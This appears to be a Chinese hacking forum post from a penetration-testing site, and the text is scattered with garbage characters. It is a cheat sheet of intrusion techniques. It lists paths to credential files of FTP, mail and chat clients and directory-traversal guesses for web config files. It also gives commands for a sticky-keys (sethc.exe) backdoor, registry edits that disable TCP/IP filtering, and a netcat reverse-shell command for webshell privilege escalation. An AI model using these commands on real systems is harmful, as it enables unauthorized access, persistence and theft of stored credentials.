- R& `) k" O; X6 J  ^c:\Program Files\Apache Software Foundation\Tomcat 6.0\logs\isapi_redirect.log
4 u& ]: |" F0 B# e& lc:\Apache2\Apache2\bin\Apache.exe
' F! w4 E: a8 \7 o' {c:\Apache2\bin\Apache.exe
% r1 R& u8 M3 v$ r' c% I( Qc:\Apache2\php\license.txt
- O1 g  Z( D" AC:\Program Files\Apache Group\Apache2\bin\Apache.exe
/usr/local/tomcat5527/bin/version.sh
/usr/share/tomcat6/bin/startup.sh
/usr/tomcat6/bin/startup.sh
c:\Program Files\QQ2007\qq.exe
c:\Program Files\Tencent\qq\User.db
# N* M7 I: b( `) ?3 ~c:\Program Files\Tencent\qq\qq.exe
c:\Program Files\Tencent\qq\bin\qq.exe
c:\Program Files\Tencent\qq2009\qq.exe
c:\Program Files\Tencent\qq2008\qq.exe
c:\Program Files\Tencent\qq2010\bin\qq.exe
6 e1 @" y  I: d5 rc:\Program Files\Tencent\qq\Users\All Users\Registry.db
9 e' U1 J. X" I3 E: lC:\Program Files\Tencent\TM\TMDlls\QQZip.dll
c:\Program Files\Tencent\Tm\Bin\Txplatform.exe
c:\Program Files\Tencent\RTXServer\AppConfig.xml
2 L7 K$ J2 a4 h+ t# lC:\Program Files\Foxmal\Foxmail.exe
7 e) B* L+ x* y$ s; [" I* [C:\Program Files\Foxmal\accounts.cfg
6 F3 |* U4 `6 t% P  U5 BC:\Program Files\tencent\Foxmal\Foxmail.exe
3 |4 V5 B, ?! |# |8 d. @  EC:\Program Files\tencent\Foxmal\accounts.cfg
$ S9 |) Y% o% iC:\Program Files\LeapFTP 3.0\LeapFTP.exe
% u' G' [- C3 i6 [8 j+ VC:\Program Files\LeapFTP\LeapFTP.exe
c:\Program Files\GlobalSCAPE\CuteFTP Pro\cftppro.exe
c:\Program Files\GlobalSCAPE\CuteFTP Pro\notes.txt
# L8 {) ^2 v8 G0 \/ ^C:\Program Files\FlashFXP\FlashFXP.ini
C:\Program Files\FlashFXP\flashfxp.exe
- @+ l* Z; `/ [2 a+ f8 d) oc:\Program Files\Oracle\bin\regsvr32.exe
4 v' u$ o; ~4 ^) r' T+ Dc:\Program Files\腾讯游戏\QQGAME\readme.txt
c:\Program Files\tencent\腾讯游戏\QQGAME\readme.txt
c:\Program Files\tencent\QQGAME\readme.txt
/ U! H% j8 P5 E- |9 l- EC:\Program Files\StormII\Storm.exe
  Y5 H1 T, n6 s# T
$ H3 O; N+ ~0 g3.网站相对路径:

+ y: a: M6 r  g' O/config.php
../../config.php
2 \' K) A$ C, R5 w( Z, {3 N../config.php
6 ^0 `$ G# @. q6 a# G  w../../../config.php
/config.inc.php
./config.inc.php
../../config.inc.php
../config.inc.php
) b; P2 m( T' h  j4 p../../../config.inc.php
/conn.php
./conn.php
../../conn.php
../conn.php
../../../conn.php
/conn.asp
./conn.asp
../../conn.asp
3 Y* D9 c4 T" d& o../conn.asp
../../../conn.asp
3 z0 w) F  f9 M: q/config.inc.php
./config.inc.php
../../config.inc.php
../config.inc.php
../../../config.inc.php
/config/config.php
../../config/config.php
../config/config.php
: e# L8 Q& D( D( _../../../config/config.php
/config/config.inc.php
* N( S8 S+ R% p) b, w# r4 Y$ O./config/config.inc.php
! ?( A& G) L; X4 \! S../../config/config.inc.php
../config/config.inc.php
2 {% d! T% w$ I! x' }. e../../../config/config.inc.php
- X+ N4 S; v/ _! h9 ~/config/conn.php
/ h' [, V6 F5 d' n  x./config/conn.php
../../config/conn.php
+ {% v, T4 p" J../config/conn.php
$ |. c& E- u8 {' ]# f5 L../../../config/conn.php
/config/conn.asp
./config/conn.asp
) z3 F+ {: \. Z. R0 q) f% W" `../../config/conn.asp
2 ^, |4 E  C% |1 p! ^$ n../config/conn.asp
; b) U5 f0 F- U" T../../../config/conn.asp
# K7 ^/ X- d& `% ]( z; `- ]: V/config/config.inc.php
2 X; I+ U# T2 ]/ j8 p./config/config.inc.php
../../config/config.inc.php
../config/config.inc.php
% O: p* `% `' X/ D8 @../../../config/config.inc.php
/data/config.php
../../data/config.php
1 t* w4 J- g1 |4 |# p2 o../data/config.php
../../../data/config.php
  w  C- Z* S7 \0 F( O/data/config.inc.php
./data/config.inc.php
../../data/config.inc.php
../data/config.inc.php
../../../data/config.inc.php
/data/conn.php
./data/conn.php
  y0 y4 {4 ]+ Z: J! y../../data/conn.php
, M) X+ |" z# ]+ e: X. G5 H7 [../data/conn.php
../../../data/conn.php
/data/conn.asp
7 t+ \- T# M* p! @./data/conn.asp
7 |1 e/ f: V  h* |../../data/conn.asp
../data/conn.asp
../../../data/conn.asp
( m' \2 G- {6 I: O8 C# o" m  T, N0 r/data/config.inc.php
./data/config.inc.php
../../data/config.inc.php
# ], x3 ?5 J) {& \. y0 Y/ Q../data/config.inc.php
../../../data/config.inc.php
/include/config.php
../../include/config.php
../include/config.php
3 m! |" ~0 F' P4 b' U2 T) v: Z* N../../../include/config.php
/include/config.inc.php
( ?3 I9 ]5 t+ x7 f. T: M+ l./include/config.inc.php
../../include/config.inc.php
" M( H6 _4 X/ D  Z1 S../include/config.inc.php
) _+ O+ S/ F, o+ w0 P  k- t../../../include/config.inc.php
/include/conn.php
* b8 h* u) V* N6 t" _7 E7 o5 \1 _./include/conn.php
../../include/conn.php
../include/conn.php
../../../include/conn.php
/include/conn.asp
./include/conn.asp
../../include/conn.asp
../include/conn.asp
../../../include/conn.asp
5 O4 m- N/ ~5 ~+ c2 R" j/include/config.inc.php
0 l6 b( c2 F  K7 G./include/config.inc.php
  f' C# a* M6 P* u* o../../include/config.inc.php
! S3 _5 W5 @; y! p: c% h../include/config.inc.php
# x. i2 g/ z/ x' J../../../include/config.inc.php
/inc/config.php
../../inc/config.php
../inc/config.php
1 D! j. c3 S* _8 K9 A# d../../../inc/config.php
/inc/config.inc.php
1 ?' X5 Y$ C/ K# d/ c- n./inc/config.inc.php
' `' X- c: f( A* H0 q../../inc/config.inc.php
../inc/config.inc.php
../../../inc/config.inc.php
( u9 \+ ^9 I  {' Q. ]7 O5 A* t/inc/conn.php
2 ]6 M( e: F4 ]. ?./inc/conn.php
6 C# Z2 g+ W" s- B) h../../inc/conn.php
../inc/conn.php
, Q8 Y1 a& S1 F. ^9 J' {/ y# S' }../../../inc/conn.php
" e6 f$ {# J2 ]  T, S! J1 B/inc/conn.asp
0 ~0 _. z# n6 \! k& e./inc/conn.asp
../../inc/conn.asp
$ y* I. o. v& m+ r) M% [- I../inc/conn.asp
../../../inc/conn.asp
/inc/config.inc.php
./inc/config.inc.php
../../inc/config.inc.php
../inc/config.inc.php
../../../inc/config.inc.php
/index.php
' c0 [9 p/ I9 n( n. B! p./index.php
$ m: u$ k; U% K1 R/ B, a7 u. Z../../index.php
../index.php
../../../index.php
/index.asp
% \4 I6 ?: `& y. [8 {./index.asp
) C: P; n0 k% P, d; }; D5 ~../../index.asp
# k$ |/ I8 \' [: y) a$ [../index.asp
../../../index.asp
替换SHIFT后门
　attrib c:\windows\system32\sethc.exe -h -r -s

! H0 i2 u* E. r% v6 i) x　　attrib c:\windows\system32\dllcache\sethc.exe -h -r -s

　　del c:\windows\system32\sethc.exe

　　copy c:\windows\explorer.exe c:\windows\system32\sethc.exe

　　copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
5 z3 |. v( V0 ]' @5 ?, q
　　attrib c:\windows\system32\sethc.exe +h +r +s

* G$ f$ w0 H* w6 Y* G/ w1 o5 v　　attrib c:\windows\system32\dllcache\sethc.exe +h +r +s
去除TCPIP筛选
! Q! O% R0 N: [$ k) `/ j, {4 r$ }TCP/IP筛选在注册表里有三处，分别是：
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
0 O4 N+ B* D3 z' \HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
- t2 x( l/ ]$ Q9 w) S5 m- eHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
! S! u4 c8 _9 j+ a  @8 p
  Y+ {) M  W6 y& I分别用
: C6 j9 @: |+ o( Rregedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
# k$ s" b1 {' n# f7 K) Y& ]; [regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
命令来导出注册表项
/ Z, \& x; G. v, _$ M
然后把 三个文件里的EnableSecurityFilters"=dword:00000001，改成EnableSecurityFilters"=dword:00000000
+ G! S% T) j* p- D4 i+ x4 @
再将以上三个文件分别用
regedit -s D:\a.reg
4 y  u9 A1 M0 x# _2 D  `1 \regedit -s D:\b.reg
# L) x4 W) t' a9 c$ ^regedit -s D:\c.reg
) r/ ~$ `' U6 T导入注册表即可
7 `0 v% u# m* e% E- a; I/ A' d
$ E0 o) h5 C/ z6 h6 W8 A$ V1 zwebshell提权小技巧
cmd路径:
c:\windows\temp\cmd.exe
nc也在同目录下
例如反弹cmdshell：
"c:\windows\temp\nc.exe -vv ip 999 -e c:\windows\temp\cmd.exe"
通常都不会成功。
: d' s( d8 w% s7 L  M
而直接在 cmd路径上 输入 c:\windows\temp\nc.exe
: n+ b" {2 @6 z7 v/ b# O: q命令输入   -vv ip 999 -e c:\windows\temp\cmd.exe
却能成功。。
2 g2 U& v1 v! O9 C这个不是重点
4 T2 `8 H' |" L$ B7 V9 O% o$ |我们通常 执行 pr.exe 或 Churrasco.exe 时 有时候也需要 按照上面的 方法才能成功

---

欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)

Powered by Discuz! X3.2